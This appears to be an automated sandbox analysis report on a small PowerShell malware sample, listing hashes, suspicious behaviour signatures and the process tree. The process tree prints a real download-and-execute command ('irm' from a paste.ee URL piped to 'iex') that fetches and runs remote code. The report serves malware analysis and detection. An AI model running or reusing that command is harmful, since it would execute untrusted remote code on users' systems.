Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
08/03/2025, 17:56
Static task
static1
Behavioral task
behavioral1
Sample
script.ps1
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
script.ps1
Resource
win10v2004-20250217-en
General
-
Target
script.ps1
-
Size
50B
-
MD5
f7907aaa36ecbdf6ea474650bea2b747
-
SHA1
11356251ecc1dca11f6e372197d4d757dd6eb43d
-
SHA256
30d852a6064a9f9e57981364edbee0c7a1fecc1d9681bb2a9255e3b13da0c67f
-
SHA512
8c61c47b5d20e41147bbe3c737cf033bf00392e6dd69f8fab6dca4f54170378fef7233dccf7d8c1eabc322240e920168ed9920af0a3a83a1d13d212eff82b25e
Malware Config
Signatures
-
pid Process 2868 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2868 powershell.exe 2880 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2868 powershell.exe Token: SeDebugPrivilege 2880 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2868 wrote to memory of 2880 2868 powershell.exe 29 PID 2868 wrote to memory of 2880 2868 powershell.exe 29 PID 2868 wrote to memory of 2880 2868 powershell.exe 29
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\script.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "irm https://paste.ee/d/linhgh7d | iex"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2880
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD531b2cad31cf30caee28a90976caddaca
SHA16c582be27c9dd3da2f717f84baeb7f9f51ce90f6
SHA2567d15cf2b1b8eb23ac4b91aa477c3a3c7ab95fc9a859cff4e0a27539e6bd7be51
SHA5123b0d7af2e4b3279dc28c2c24163455d8b04068d37b36693e6d0887e94a1e01b42ef0fa3263ee917c9e6f0d2a242a32cb99d33b8a43bb833d67611aeba9fe0014